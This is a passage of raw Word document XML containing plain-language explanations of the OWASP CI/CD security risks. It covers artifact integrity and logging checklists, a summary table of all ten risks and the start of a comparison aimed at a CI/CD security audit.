        <w:t>myapp:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508CFDA2" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>without verifying its digest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEB00C6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>The tag could point to a different image than the one originally built.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11898C5E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What you check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DA9CDB" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are artifacts digitally signed? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C06BEE" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are signatures verified before deployment? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF9524B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are checksums/digests verified? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D6D001" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are artifacts stored in trusted repositories? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF67826" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can artifacts be overwritten? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696C3613" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Is artifact immutability enforced? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776362DF" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Does deployment use the exact artifact produced by the approved build? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD4FB66" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are Docker image digests used? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BD5199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Easy way to remember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F01061" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEC-9 = Can you prove the artifact you're deploying hasn't been replaced or tampered with?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1431D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:pict w14:anchorId="4EEA61A5">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63687C43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10. CICD-SEC-10 — Insufficient Logging and Visibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A73F02E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Simple meaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD1E663" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>You don't have enough logs/visibility to know what happened in your CI/CD environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8016FD" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Imagine someone changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFEDC80" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Production deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5DE640" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>but there is no record of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C571798" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Who?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0430DCE4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>When?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6196D2EB" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>What changed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72267522" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t>Which pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48688B8B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Which commit?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE2670" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Which artifact?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D599D0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>That's a visibility problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477A959B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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CA3B5E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Attacker compromises a Jenkins account and deploys malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5459BF" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>But Jenkins doesn't properly record:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4803AAA2" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>User: attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB5F62C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Time: 02:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1D05A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Pipeline: production-deploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A92C26B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Commit: abc123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3965C6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Artifact: app-5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64025424" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>You may not even know the attack happened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862C29E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What you check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD10390" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are pipeline executions logged? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60826ED2" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are authentication events logged? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E26162" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are deployment activities logged? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BEA014" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are configuration changes logged? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0FF0EF" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are logs retained? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179B0094" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can logs be modified/deleted? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3071FC11" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Is there centralized monitoring? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDFEAE6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are suspicious activities detected? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C434169" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can actions be traced to users? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B313A66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Easy way to remember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9A5290" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEC-10 = Can you see and trace what happened in your CI/CD environment?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5E53B9" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:pict w14:anchorId="10B0E504">
          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BED23F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lastRenderedPageBreak/>
        <w:t>The easiest way to remember all 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7194A668" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Think of a pipeline like a secure factory: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5736"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="79F32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0D6B8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76FA4342" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Simple question</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="6EC71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CF5B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SEC-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24B5D55D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Can someone bypass the required process?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="27A52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27A9" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SEC-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="210A6A85" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Who can access the CI/CD system?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="5A13C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0D4F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SEC-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E80463F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Can a dependency compromise the pipeline?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="05F4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B79B9" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SEC-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44798BCB" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Can someone make the pipeline execute malicious code?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="60334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E8D5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SEC-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75A1EDF8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>What can the pipeline/job itself access?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="023A3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C983" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SEC-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62877902" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Are credentials/secrets handled safely?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="1A2D3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A612" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SEC-7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B4FA9AD" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Is the CI/CD infrastructure securely configured?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="0223F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3B66" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SEC-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69F8A021" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Are third-party tools/services properly governed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="39767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C1E7" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SEC-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0865839B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Can we prove the artifact hasn't been tampered with?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="0A005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5288" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B73F163" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Can we see and trace what happened?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49E99150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The important distinctions for your audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2078881A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Since you're doing a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CI/CD security assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>, these four are especially easy to confuse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B09FF59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t>SEC-1 vs SEC-2 vs SEC-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995D21F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>SEC-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AAD277" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>"Can I bypass the process?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B590BF4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
